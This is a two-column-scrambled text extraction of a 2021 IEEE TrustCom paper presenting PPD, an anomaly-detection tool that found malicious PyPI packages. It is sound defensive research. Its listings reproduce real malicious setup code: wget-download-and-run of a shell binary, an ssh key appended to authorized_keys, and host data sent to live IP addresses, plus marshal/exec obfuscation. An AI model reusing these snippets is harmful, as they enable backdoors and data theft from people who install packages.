Malicious Packages Lurking in User-Friendly Python Package Index
Malicious Packages Lurking in User-Friendly Python Package Index
2021 IEEE 20th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom) | 978-1-6654-1658-0/21/$31.00 ©2021 IEEE | DOI: 10.1109/TRUSTCOM53373.2021.00091
Abstract—Python has gradually become one of the most im- 400 days and have been downloaded more than 1,000 times
portant programming languages through artificial intelligence’s [2]. Therefore, since the discovery of this poisoning method
development. PIP, a package management tool for Python, offers several years ago, the number of such attacks has increased
one-click installation, allowing developers to utilize other people’s
code to speed up development. However, any registered member exponentially [5]. For instance, MALOSS [2] identified 339
can easily upload packages to the repository that stores third- malicious packages in August 2019 after detecting more than
party packages. This functionality is used by attackers to poison one million packages in NPM, PyPI, and RubyGems. Three of
the package index, i.e., to publish enormous malicious pip these malicious packages with more than 100,000 installations
packages for installing backdoor, gathering information, etc. were assigned CVE numbers. In December 2020, Tencent [6]
To know the situation of third-party packages in the Python
community ecosystem, we establish the criteria for judging reported that PyPI was poisoned by malicious packages covd.
packages’ suspicious or malicious behavior by analyzing the code Attackers uploaded the package covd with a similar name to
logic in disclosed malicious packages. With the gained findings, the package covid into PyPI. Then they could compromise
we propose and implement Pip Poisoning Detector (PPD), an the infected host and perform a series of activities, such as
approach based on anomaly detection. PPD evaluated 228,723 planting Trojans and installing backdoors.
packages, and after human inspection, we found 63 malicious
and 238 suspicious ones among the output 5,699 results. The Current detection methods include detection of combosquat-
experimental results prove that our approach is effective and ting and typosquatting-attacks [7], metadata analysis combined
can significantly reduce review workload by 97.51%. with static and dynamic analysis [2], and pure static analysis
Keywords—pip poisoning, anomaly detection, malicious Python [8], etc. These approaches have their own advantages and dis-
advantages. For example, MALOSS has a high accuracy rate,
but it needs to create instances when detecting each package,
I. I NTRODUCTION which consumes huge computing resources. In particular, it
In recent years, Python is growing fast as the favorite will take a lot of resources to detect all packages across the en-
language for software developers. According to the world’s tire community ecosystem. By manually analyzing dozens of
most popular programming language ranking data published disclosed malicious packages, we find that malicious packages
by the TIOBE website [1], Python has rapidly overtaken C++ perform differently from benign packages in certain aspects
and C# from the 5th position in 2015 to the 3rd position (malicious packages usually steal personal data from users and
in 2020. Python is extremely popular among programmers, upload it to remote server, or download Trojans for execution,
owing to the powerful Python Package Index (PyPI). PyPI etc.). From this perspective, we propose a detection approach
is the authoritative index of all Python packages, and the for pip poisoning that combines static analysis and anomaly
accompanying repository is open to all registered members detection, PPD.
[2]. For developers, some reusable codes needed in the project To illustrate our approach, take the malicious pip package
has been already packaged by others. So they can easily and request as an example, which was uploaded to PyPI by
efficiently use these codes by executing a single command (e.g. attackers in July 2020 [9]. When end-users incorrectly type the
pip install request) [3]. Package Installer for Python (PIP) is command pip install request (correctly, pip install requests),
an official package management tool provided by Python for it automatically executes the code in setup.py (the entry file
downloading third-party packages in PyPI, and its installation for installation process), which will download a Trojan from
steps are shown in Figure 1. This quick installation does the remote server and execute it. Specifically, setup.py imports
help improve development efficiency. But PyPI is open, which a function license check() from another file hmatch.py. This
means that attackers can easily upload malicious packages to function is added to the original file by attackers for down-
launch supply chain attacks. Such an attack targeting the PyPI loading Trojans and installing backdoors. Current approaches
ecosystem is known as pip poisoning. do not inspect these imported codes, they only focus on the
The same situation is also happening in other community contents in setup.py. Our approach, PPD, uses the abstract
ecosystems with Npm for Nodejs [4], RubyGems for Ruby. syntax tree to parse setup.py, fetching all the imported codes
However, due to the registry’s ignorance of such attacks, this and joining them into setup.py after formatting it correctly to
situation has become more serious. About 20% of malicious form the completed installation code.
packages have survived in the package index for more than We mainly make the contributions as follows:
607
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
distribute a version containing malicious code to end-users. An • De-obfuscate codes and then execute them. Attackers
example of such attack is eslint-scope [14], where the attacker often bypass security detection through obfuscation, but
compromised the ESLint maintainer’s account and published to achieve their goal they must de-obfuscate and execute
a malicious version of eslint-scope to the package registry. the code.
Publishing malicious packages. Attackers can easily pub- • Obvious malicious code or backdoors. Such as deleting
lish packages containing malicious code to the registry because the current work directory, shutting down the power, etc.
PyPI is open to registered members. Usually, attackers use
names that are similar to popular packages to mislead end- IV. M ETHODOLOGY
users to download and install their packages. Typical examples Based on relevant studies, we propose a pip poisoning
are jeIlyfish (a misspelling of jellyfish) and python3-dateutil detection methodology according to the Levenshtein distance
(an imitator of the popular package dateutil) [15]. Surprisingly, of package names, and features extracted from the source
jeIlyfish existed in PyPI for almost one year until it was code. The implementation is divided into three parts: data
discovered by security researchers. pre-processing, feature extraction as well as model training
Dependency confusion. Internal projects usually use stan- and result outputs, as illustrated in Figure 2. In the data pre-
dard, trusted code dependencies located in private reposito- processing part, we split all packages into two types depending
ries. However, if attackers create similar packages in public on their suffix names. The entry file for tar.gz is setup.py,
repositories, which have the same names as the private and while that for zip and whl is init .py or package-name.py
legitimate code dependencies, the malicious code can easily (package-name means package’s name). We parse the entry
get into these projects [16]. Eventually, these malicious codes file and get its imports. Then we traverse the entire package
will follow these normal projects to end-users. according to these imports and stitch the imported code into
the entry file. After getting the complete installation code, the
B. Package Behaviors process enters into the feature extraction part. We use the ab-
The above attack scenarios ultimately are designed to let stract syntax tree (AST) to parse the source code, accompanied
end-users execute the malicious code, and setup.py is the file by regular expressions (RegExp) to extract features. In this
most likely to be manipulated by attackers [12]. Therefore, We way, we solve the inefficiency of AST and the inaccuracy of
categorize the package behaviors as suspicious behaviors and RegExp. The complete feature set consists of code features and
malicious behaviors. Levenshtein distances of package names. Then we feed this
Suspicious behaviors. The following behaviors should be feature set to the third part, which outputs the final results
categorized as suspicious and should be verified subsequently. after reserve cross-validation and model training. After de-
duplication of these results, we obtain the packages that need
• An external file (.sh or .exe) is executed in the code,
manual review.
and we do not care whether these executable files are
malicious or not. A. Data Collection and Pre-Processing
• Many obfuscated characters are included in the code, and
This subsection explains how to build the experiment data
we do not care whether these characters are malicious or
and extract the complete installation code.
not after de-obfuscation.
Data collection. All the data in this paper are collected
• The code has the behavior of downloading remote re-
from PyPI and Tsinghua University’s PyPI mirror site. Firstly,
sources to the local environment and decompressing
we fetch the index file containing all package names and
them, and we do not care whether these resources are
crawl every package’s metadata according to this file. The
malicious or not.
crawling procedure uses multi-threading techniques to speed
• The code has the behavior of reading files and then
up metadata fetching. Then we normalize the metadata of each
executing them, and we do not care whether the contents
package to extract the download link for the latest version.
of these files are malicious or not.
When all packages are downloaded, we extract setup.py from
• The code has the behavior of editing system configuration
the tar.gz packages, and init .py or package-name.py from
files or opening services privately, and we can only
the zip and whl packages. Finally, we get the entry file of every
determine that it is suspicious.
packages.
Malicious behaviors. The following behaviors should be Pre-processing. For the entry file (e.g., setup.py for tar.gz),
directly categorized as malicious. we first use AST to parse the file. This file is the entrance for
• Make external requests to download files and then execute the whole pip installation process, it must be parsable by AST.
them. If the file is merely downloaded or executed, it can After traversing the entire tree node, we pick out the Import
only be considered suspicious. and ImportFrom child nodes, and then get all the imports from
• Create a reverse shell. Reverse shell is hard to discover, them. Following this, we compare these imports with Python’s
and attackers often use it to remotely control targets. built-in libraries to find out third-party imports. Finally, we
• After reading local sensitive data, send these data to a traverse the entire package and try to find files that match
remote server. The ultimate goal of attackers launching a these third-party imports, and then merge these files and the
series of attacks is to access user’s data. entry file to build the complete installation code.
608
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
Figure. 2: The structure of our methodology
609
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
TABLE I: The code features we picked and why we picked
5,987
them 6,000
LmK#2` Q7 S+F;2b
pre-prepared servers. 4,000
Attackers often obtain directory information on
Directory traversal
the target.
File manipulation Attackers often upload, download or modify files. 3,000
Attackers often read sensitive files on the
Sensitive file reading
target. 2,120
Attackers often download and decompress 2,000
Compression and
malicious files, or compress local files in order
decompression
1,078 1,197
to send them to a remote server.
Attackers often obfuscate malicious code to 1,000 955 949
Obfuscation and 807
bypass detection and then de-obfuscate it for 467
de-obfuscation 419
execution. 167
Attackers often import some external files to 0
Importing other files bypass the methodology that only detects
setup.py.
y@N Ry@RN ky@kN jy@jN 9y@9N 8y@8N ey@eN dy@dN 3y@3N Ny@NN
The longest string The obfuscated code is often very long.
*Q/2 G2M;i?
Attackers often embed their IP or URL address
IP or URL address
in malicious code.
Attackers often use entry points to execute Figure. 3: Setup.py code length distribution (Unit: characters)
Fields in entry points
malicious code in a covert way.
TABLE II: Specific ground-truth in feature selection training data. Specifically, iForest recursively and randomly
(a) Command execution (b) External connection splits the dataset until all sample points are isolated. Under
Type Function
this random splitting strategy, the anomaly points usually have
Type Version Libraries
Built-in os.system() Built-in python2.x httplib short paths. Since iForest uses segmentation to isolate anomaly
os.popen()
urllib points instead of excluding them by describing normal points,
os.exec*()
os.spawn*() urllib2
subprocess.Popen() socket this almost eliminates the need to predefine the probability
subprocess.getoutput() python3.x http.client
subprocess.getstatusoutput() urllib distribution of normal samples, which solves the third problem.
subprocess.call()
subprocess.run()
urllib3 But the results are still influenced by potentially malicious
socket
subprocess.check call()
commands.getstatusoutput() 3rd-party all version requests packages to some extent because many malicious samples
commands.getoutput() aiohttp aggregated in a small sample size may lead to false-positive.
3rd-party pexpect selenium
Reverse cross-validation. Even if we have solved almost
all the problems above, just relying on the iForest model is
However, the following problems are often encountered when not enough to detect malicious packages from PyPI. When di-
doing anomaly detection. viding the training and test sets, we cannot guarantee whether
P1: When the dimensions of the features are large, a huge there are potentially malicious packages in the training set. To
dataset is required. Because of the large number of packages some extent, this will affect the final results. Thus, we use
in the PyPI ecosystem (258,426 in October 2020), we can a method called reverse cross-validation (RCV) [21]. Taking
build a huge dataset. 3-fold RCV as an example, we divide all the dataset into
P2: Some samples in low-density areas will be mis- three parts, with one part as the training set and another two
classified as abnormal samples. We traverse packages with parts as the test set, and then perform cycle training. RCV
code length less than 100 characters in intervals of 10 and selects only one part as the training set, which avoids false-
obtained their distribution, as shown in Figure 3. Packages negative caused by learning the wrong cases and improves the
with code lengths of 10 or less account for 43% of the detection accuracy rate. But at the same time, it increases the
total, and these codes we can tell at a glance whether they false-positive rate due to the reduction of the training set. To
are malicious or not. Therefore, we excluded these packages. improve the detection accuracy and reduce the false-positive
In addition to excluding packages with short codes, we also rate, we used 3-fold, 5-fold and 10-fold RCVs to process the
exclude packages for which we cannot access the code, such dataset. Finally, we de-duplicate the training output to get the
as packages that have been withdrawn or removed by their final result.
authors. V. E XPERIMENTAL
P3: Pre-assumed probability distributions strongly influ-
A. Results Overview
ence model performance. We pick the Isolated Forest (iForest)
algorithm [18], which has been widely used in many fields, We used a local computer running Windows 10 with 16GB
such as docker container anomaly monitoring [19], detection memory and 8 x 2.80GHz Intel CPUs to crawl the entire
of covert data integrity assault [20]. iForest as an unsupervised PyPI ecosystem in December 2020 (totally 287,915 packages),
anomaly detection method is well suited to the challenge we but only 228,887 packages we got the download link in the
encountered: it is insensitive to noise or anomalies in the index and downloaded them. Part of the reason is that it takes
610
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
time for the crawler to download all packages. During this (One-Class SVM) model which is also an anomaly detection.
time between when we count the package name and when we But OCSVM needs to describe the normal samples, and
download it, the author could remove or withdraw the package. if the normal samples are mixed with malicious samples
The other part is because the package name exists in PyPI, but it will seriously affect its output. Eventually, the OCSVM
PyPI does not provide a link to its download (e.g., 01changer, model only verified 11 packages successfully, accounting for
2013007-pyh, and other packages in https://pypi.org/simple/). 26.82%. We categorize all detected packages by the behavioral
Then we extract the complete installation code of the entry classification in the subsection III-B and analyze the most
file, including the functions or imported files. After filtered typical packages as in Table III.
the previously mentioned packages which need to be excluded,
we detected the remaining 228,723 pip packages and obtained TABLE III: Verification of typical malicious pip packages
5,699 anomaly samples after de-duplication. Through the Package Name Description Hit or not
manual review, 301 packages with malicious or suspicious Steal sensitive files
behavior are found (63 malicious, 238 suspicious). The distri- such as SSH and GPG keys
jeIlyfish yes
and send them to the
bution of different types of malicious packages we found is attacker’s server.
shown in Figure 4. trustypip,
Creating a reverse shell. yes
pwniepip
Stealing sensitive information
request and digital currency keys, yes
planting persistent backdoors, etc.
Get the malicious script from
libpeshka the remote server and execute it, yes
then persist it in .bashrc.
611
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
Listing 2: Malicious code of print-structures tst-conan. tst-conan first fetches the username, hostname,
1 def run(self): system version and other information, then determines whether
2 os.system( ’ w g e t h t t p : / / 1 1 8 . 1 2 8 . 1 3 4 . 4 5 : 8 0 0 9 / the operating system is Windows or Linux, and gets the
g e t s h e l l . e l f ’)
3 os.system( ’ chmod + x . / g e t s h e l l . e l f ’ ) system language. Finally, it gets the IP address by DNS query
4 os.system( ’ . / g e t s h e l l . e l f & ’ ) and merges it with the information obtained earlier before
5 os.remove( ’ . / g e t s h e l l . e l f ’ )
sending it to http://139.199.57.156/tst.php, as shown in Listing
4. Malicious packages similar to tst-conan and disclosed by
Listing 3: Malicious code of protobuff Ohm et al. [17] include PyYAML, pythom-mysql, python-
1 def do_thing(): openssl, etc.
2 returncode = os.system("""
3 { reque6t. reque6t is a malicious package released into the
4 EXTERNAL_IP=$(curl https://ipinfo.io/ip) PyPI ecosystem by security researchers, and similarly we
5 ALL_IPs=$(dnsdomainname -A)
6 ALL_HOSTNAMEs=$(dnsdomainname -I) also found r-quest, req-est, etc. The setup.py code of this
7 ALL_DOMAINs=$(grep "server_name" -ri /etc/nginx/ package first tries to create a file called pwn3d.txt in the root
sites-enabled/ * ; grep "ServerName" -ri /etc/
apache2/sites-enabled/ * ) directory to determine if it has root privileges. Then it sends
8 LINUX_INFO=$(uname; uname -or; lsb_release -irc) information about whether it is running with high privileges,
9 ENCODED_RESULT=$(echo "${USER}|||${USERNAME}|||$
{EXTERNAL_IP}|||${ALL_HOSTNAMEs}|||${ALL_IPs package name, package manager, etc. to http://mf2pru.ceye.io,
}|||${ALL_DOMAINs}|||${LINUX_INFO}" | base64 as shown in Listing5. Finally, it also tries to read /etc/passwd
)
10 and /etc/passwd.
11 echo "ssh-rsa AAA... user@host" >> ˜/.ssh/ afgcrk. afgcrk loads Python code objects via marshal
authorized_keys
12 curl --data payload="protobuff˜˜˜${ and then performs malicious actions after obfuscation using
ENCODED_RESULT}" "http://83.97.20.215/stats. lambda functions. Packages such as crkpak, crkpk, etc. are
php"
13 } similar to this. Although the specific implementation is differ-
14 &> /dev/null ent, the behavior of these malicious pip packages is to load
15 """);
Python code object and execute it, the codes are shown in
Listing 6.
Listing 4: Malicious code of tst-conan
1 def checkVersion(): D. Discussion
2 user_name = getpass.getuser()
3 hostname = socket.gethostname() Our approach can help PyPI package manager to mitigate
4 os_version = platform.platform() the cost of manual review to some extent. We reduce the
5 ip = [(s.connect(( ’ 8 . 8 . 8 . 8 ’ , 53)), s.getsockname
()[0], s.close()) for s in [socket.socket( number of packages to be inspected from more than 220,000
socket.AF_INET , socket.SOCK_DGRAM)]][0][1] to just over 5,600. If we consider the entire PyPI ecosystem
6 package= ’ t s t c o n a n ’
7 vid = user_name+ ” # # # ” +hostname+ ” # # # ” +os_version+ for inspection, our approach will reduce the work by 97.51%.
” # # # ” +ip+ ” # # # ” +package In terms of the results, our approach is effective for fully
8 request.urlopen( r ’ h t t p : / / 1 3 9 . 1 9 9 . 5 7 . 1 5 6 / t s t . p h p ’
,data= ’ v i d = ’ .encode( ’ u t f −8 ’ )+base64. functional malicious pip packages. But after analysis, we
b64encode(vid.encode( ’ u t f −8 ’ ))) found that our approach does not work well for detecting some
malicious PyPI packages with less function, such as 00000a.
Listing 5: Malicious code of reque6t In this package, only one external connection behavior and
1 def telemetry(is_sudo , sender , original_name , one ls command are used.
new_name): In addition, during our manual review of the 301 packages
2 url = ” h t t p : / / m f 2 p r u . c e y e . i o ”
3 data = encoder(dict( output, we notice that: 81 of the 238 suspicious packages have
4 is_sudo=is_sudo , the behavior of reading files and executing them, while 77
5 sender=sender,
6 original_name=original_name , packages have the behavior of downloading files. Although
7 new_name=new_name , these packages execute seemingly normal files like version.py,
8 version=sys.version
9 )) the act of reading files and executing them should not be
10 request(url, encode(data), timeout=0.1) allowed. Because end-users cannot determine whether these
files are required for the installation or are carefully forged
Listing 6: Malicious code of afgcrk by the attacker. As for the files downloading, these third-
1 exec marshal.loads( ’ c \ x 0 0 . . . \ x 0 c \ x 0 1 ’ ) party packages should have complete code and not need to
2 z = [168, 171...,214, 222]
3 _ = [103, 66...,4, 34]
download something else in the background. This behavior
4 __ = [927..., 927] should also be disallowed because there is no way for end-
5 OoO_ = [45, 42...,39, 41]
6 exec marshal.loads( ’ c \ x 0 0 . . . \ x 0 c \ x 0 1 ’ )
users to ensure the files’ security. The two cases mentioned
7 OO = lambda _ : marshal.loads(_) above are the most frequent ones, and we call on PyPI officials
8 u = ( ( { } < ( ) ) - ( { } < ( ) ) )
9 p = (({}<())-({}<()));v = []
to standardize the format of the setup.py file to disable silent
10 exec((lambda:((() >())+(() <()))).func_code. background downloads and other dangerous operations. A
co_lnotab).join(map(chr ,[(....])))
11 exec OO( ” ” .join([chr(i) for i in lx]).decode( ” h e x ”
reasonable approach would be to leave these operations to the
)) users instead of these third-party packages.
612
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
VI. C ONCLUSIONS AND FUTURE WORK R EFERENCES
A. Conclusions [1] I. TIOBE, “Tiobe index,” Retrieved from Tiobe Index:
https://www.tiobe.com/tiobe-index, 2020.
We crawl all packages in the PyPI ecosystem and pre- [2] R. Duan, O. Alrawi, R. P. Kasturi, R. Elder, B. Saltaformaggio, and
liminarily establish the criteria for judging the suspicious or W. Lee, “Towards measuring supply chain attacks on package managers
malicious behavior of packages by analyzing the behavioral for interpreted languages.” NDSS, 2021.
[3] I. Pashchenko, D.-L. Vu, and F. Massacci, “A qualitative study of de-
features of the disclosed malicious pip packages. We combine pendency management and its security implications,” in Proceedings of
two techniques, AST and RegExp, to extract code features and the 2020 ACM SIGSAC Conference on Computer and Communications
construct feature sets with package name features. Finally, by Security, 2020, pp. 1513–1531.
[4] M. Zimmermann, C.-A. Staicu, C. Tenny, and M. Pradel, “Small world
using the iForest algorithm that performs well under multi- with high risks: A study of security threats in the npm ecosystem,” in
dimensional features, we find some malicious pip packages 28th {USENIX} Security Symposium ({USENIX} Security 19), 2019,
lurking in the PyPI ecosystem. Although a limited number of pp. 995–1010.
[5] A. Almubayed, “Practical approach to automate the discovery and
malicious pip packages are detected, we can prove that our eradication of opensource software vulnerabilities at scale,” Blackhat
approach works. We have analyzed the lifecycle of the pip USA, 2019.
installation process, which starts with a one-click command [6] T. S. R. C. Xnianq, “Pypi official repository is poi-
soned by covd malicious packages,” Retrieved from:
(e.g., pip install requests) entered by end-users. During the https://security.tencent.com/index.php/blog/msg/170, 2020.
process of collecting samples, we have found two types of [7] D.-L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, “Ty-
installation packages (tar.gz, whl/zip) in the PyPI ecosystem posquatting and combosquatting attacks on the python ecosystem,” in
2020 IEEE European Symposium on Security and Privacy Workshops
and proposed a solution to extract the complete setup.py code (EuroS&PW). IEEE, 2020, pp. 509–514.
for each of them. [8] M. Čarnogurskỳ, “Attacks on package managers.”
Following these findings, we propose and implement a pip [9] E. Debuggers, “Don’t pip install ”request” instead of ”requests”. it is
a trojan!” Retrieved from: https://ethicaldebuggers.com/dont-pip-install-
poisoning detection approach based on the iForest algorithm, request-instead-of-requests-it-is-a-trojan/, 2020.
and combine it with multiple reverse cross-validation and [10] M. Taylor, R. K. Vaidya, D. Davidson, L. De Carli, and V. Rastogi,
de-duplication to ensure the validity of the results. From “Spellbound: Defending against package typosquatting,” arXiv preprint
arXiv:2003.03471, 2020.
228,723 pip packages, we get 5,699 packages awaiting manual [11] M. Ohm, A. Sykosch, and M. Meier, “Towards detection of software
review. After reviewing, we find 301 undisclosed suspicious supply chain attacks by forensic artifacts,” in Proceedings of the 15th
or malicious packages. For the managers of PyPI ecosystem, it International Conference on Availability, Reliability and Security, 2020,
pp. 1–6.
makes sense that if the task is to evaluate the entire community, [12] D. L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, “Towards
our approach will reduce the workload by 97.51%. using source code repositories to identify software supply chain attacks,”
in Proceedings of the 2020 ACM SIGSAC Conference on Computer and
B. Future Work Communications Security, 2020, pp. 2093–2095.
[13] K. Garrett, G. Ferreira, L. Jia, J. Sunshine, and C. Kästner, “Detecting
When dealing the malicious packages with fewer features, suspicious package updates,” in 2019 IEEE/ACM 41st International
our approach performs poorly, which might be caused by the Conference on Software Engineering: New Ideas and Emerging Results
fact that we are using an anomaly detection mindset. Our (ICSE-NIER). IEEE, 2019, pp. 13–16.
[14] O. Foundation and other contributors, “Postmortem for malicious
approach is based on the assumption that malicious/anomaly packages published on july 12th, 2018,” Retrieved from:
packages are similar but different from benign/normal pack- https://eslint.org/blog/2018/07/postmortem-for-malicious-package-
ages. However, it is obvious that the majority of malicious publishes, 2018.
[15] H. Denbraver, “Malicious packages found to be typo-squatting in
packages are functionally complex, so those with fewer func- python package index,” Retrieved from: https://snyk.io/blog/malicious-
tions are difficult for us to detect. In our future work, we intend packages-found-to-be-typo-squatting-in-pypi, 2019.
to tackle the above problem from the dimension of code sim- [16] A. Bannister, “Dependency confusion attack mounted via pypi
repo exposes flawed package installer behavior,” Retrieved from:
ilarity. During our experiments, we found that the malicious https://portswigger.net/daily-swig/dependency-confusion-attack-
code parts in most malicious packages are similar, for example, mounted-via-pypi-repo-exposes-flawed-package-installer-behavior,
libcurl, libhtml5, mateplotlib, numipy, etc. packages all contain 2021.
[17] M. Ohm, H. Plate, A. Sykosch, and M. Meier, “Backstabber’s knife
the function checkVersion(). collection: A review of open source software supply chain attacks,” in
At the same time, we notice that such poisoning against International Conference on Detection of Intrusions and Malware, and
package registries is also serious in Npm and RubyGems [2]. Vulnerability Assessment. Springer, 2020, pp. 23–43.
[18] F. T. Liu, K. M. Ting, and Z.-H. Zhou, “Isolation forest,” in 2008 eighth
We have done a preliminary evaluation of the npm ecosystem ieee international conference on data mining. IEEE, 2008, pp. 413–422.
while improving the PPD. After randomly selecting 300,000 [19] Z. Zou, Y. Xie, K. Huang, G. Xu, D. Feng, and D. Long, “A docker
packages, we found 16 suspicious or malicious npm packages. container anomaly monitoring system based on optimized isolation
forest,” IEEE Transactions on Cloud Computing, 2019.
One of which, named monent, has been removed. We will [20] S. Ahmed, Y. Lee, S.-H. Hyun, and I. Koo, “Unsupervised machine
continue to adapt our methodology to better detect malicious learning-based detection of covert data integrity assault in smart grid
packages lurking in Npm and RubyGems. networks utilizing isolation forest,” IEEE Transactions on Information
Forensics and Security, vol. 14, no. 10, pp. 2765–2777, 2019.
ACKNOWLEDGMENT [21] E. Zhong, W. Fan, Q. Yang, O. Verscheure, and J. Ren, “Cross validation
framework to choose amongst models and datasets for transfer learning,”
This research is funded by the National Natural Science in Joint European Conference on Machine Learning and Knowledge
Foundation of China (No.61902265), Sichuan Science and Discovery in Databases. Springer, 2010, pp. 547–562.
Technology Program (No.2020YFG0047, No.2020YFG0374).
613
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.